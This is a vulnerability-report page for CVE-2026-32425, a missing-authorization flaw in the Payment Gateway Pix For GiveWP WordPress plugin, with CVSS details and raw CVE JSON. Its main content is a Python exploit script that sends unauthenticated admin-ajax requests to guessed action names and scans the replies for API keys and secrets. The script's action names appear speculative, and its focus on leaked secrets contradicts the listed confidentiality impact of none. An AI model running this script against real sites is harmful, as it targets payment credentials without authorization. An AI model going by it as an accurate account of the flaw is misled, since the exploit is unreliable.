Security Vulnerability Report
中文
CVE-2026-32425 CVSS 5.3 MEDIUM

CVE-2026-32425

Published: 2026-03-13 19:55:01
Last Modified: 2026-04-22 21:30:26

Description

Missing Authorization vulnerability in linknacional Payment Gateway Pix For GiveWP payment-gateway-pix-for-givewp allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Payment Gateway Pix For GiveWP: from n/a through <= 2.2.3.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Payment Gateway Pix For GiveWP <= 2.2.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-32425 PoC - Missing Authorization in Payment Gateway Pix For GiveWP # This PoC demonstrates the missing authorization vulnerability import requests import sys TARGET_URL = "https://example-wordpress-site.com" # Replace with target URL def exploit_missing_authorization(): """ Exploit missing authorization vulnerability in Payment Gateway Pix For GiveWP plugin. The plugin fails to properly verify user permissions before executing sensitive operations. """ # Vulnerable AJAX endpoint - allows unauthenticated access ajax_endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Common vulnerable actions in this plugin vulnerable_actions = [ "pix_for_givewp_get_settings", "pix_for_givewp_get_api_key", "pix_for_givewp_get_config", "pix_for_givewp_get_payment_data" ] print("[*] CVE-2026-32425 - Missing Authorization Exploit") print(f"[*] Target: {TARGET_URL}") print(f"[*] Plugin: Payment Gateway Pix For GiveWP <= 2.2.3") print("-" * 50) for action in vulnerable_actions: print(f"\n[*] Testing action: {action}") # Send unauthenticated request data = { "action": action, "nonce": "" # Some endpoints may not require nonce for unauthenticated users } try: response = requests.post(ajax_endpoint, data=data, timeout=10, verify=False) if response.status_code == 200: print(f"[+] Request sent successfully") print(f"[+] Response status: {response.status_code}") # Check if sensitive data is returned if any(keyword in response.text.lower() for keyword in ["api_key", "secret", "config", "settings"]): print(f"[!] VULNERABLE - Sensitive data exposed!") print(f"[!] Response preview: {response.text[:500]}") else: print(f"[*] Response received: {response.text[:200]}") else: print(f"[-] Request failed with status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") print("\n[*] Exploitation complete") print("[*] If vulnerable, sensitive configuration data may be exposed") if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = sys.argv[1] exploit_missing_authorization()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32425", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:55:00.743", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in linknacional Payment Gateway Pix For GiveWP payment-gateway-pix-for-givewp allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Payment Gateway Pix For GiveWP: from n/a through <= 2.2.3."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en linknacional Payment Gateway Pix For GiveWP payment-gateway-pix-for-givewp permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Payment Gateway Pix For GiveWP: desde n/a hasta &lt;= 2.2.3."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/payment-gateway-pix-for-givewp/vulnerability/wordpress-payment-gateway-pix-for-givewp-plugin-2-2-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}